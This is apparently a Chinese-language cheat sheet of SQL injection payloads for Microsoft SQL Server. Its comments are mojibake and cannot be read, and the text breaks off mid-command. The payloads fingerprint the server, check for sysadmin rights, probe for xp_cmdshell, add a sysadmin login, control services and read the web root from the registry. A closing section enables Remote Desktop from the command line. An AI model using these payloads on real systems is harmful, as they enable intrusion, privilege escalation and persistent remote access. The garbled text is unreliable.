×¢Èë³£ÓÃSQLÓï¾ä

and exists (select * from sysobjects) //ÅжÏÊÇ·ñÊÇMSSQL
and exists(select * from tableName) //ÅжÏij±íÊÇ·ñ´æÔÚ..tableNameΪ±íÃû
and 1=(select @@VERSION) //MSSQL°æ±¾
And 1=(select db_name()) //µ±Ç°Êý¾Ý¿âÃû
and 1=(select @@servername) //±¾µØ·þÎñÃû
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //ÅжÏÊÇ·ñÊÇϵͳ¹ÜÀíÔ±
and 1=(Select IS_MEMBER('db_owner')) //ÅжÏÊÇ·ñÊÇ¿âȨÏÞ
and 1= (Select HAS_DBACCESS('master')) //ÅжÏÊÇ·ñÓпâ¶ÁȡȨÏÞ
and 1=(select name from master.dbo.sysdatabases where dbid=1) //±©¿âÃûDBIDΪ1£¬2£¬3....
;declare @d int //ÊÇ·ñÖ§³Ö¶àÐÐ
and 1=(Select count(*) from master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //ÅжÏXP_CMDSHELLÊÇ·ñ´æÔÚ
and 1=(select count(*) from master.dbo.sysobjects where name= 'xp_regread') //²é¿´XP_regreadÀ©Õ¹´æ´¢¹ý³ÌÊDz»ÊÇÒѾ­±»É¾³ý
Ìí¼ÓºÍɾ³ýÒ»¸öSAȨÏÞµÄÓû§test£º£¨ÐèÒªSAȨÏÞ£©
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
Í£µô»ò¼¤»îij¸ö·þÎñ¡£ £¨ÐèÒªSAȨÏÞ£©
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
±©ÍøվĿ¼
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) »òÕßand 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————·Ö¸î
DOSÏ¿ª3389 ²¢Ð޸Ķ˿ںÅ
sc config termservice start= auto
net start termservice
//ÔÊÐíÍâÁ¬
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDe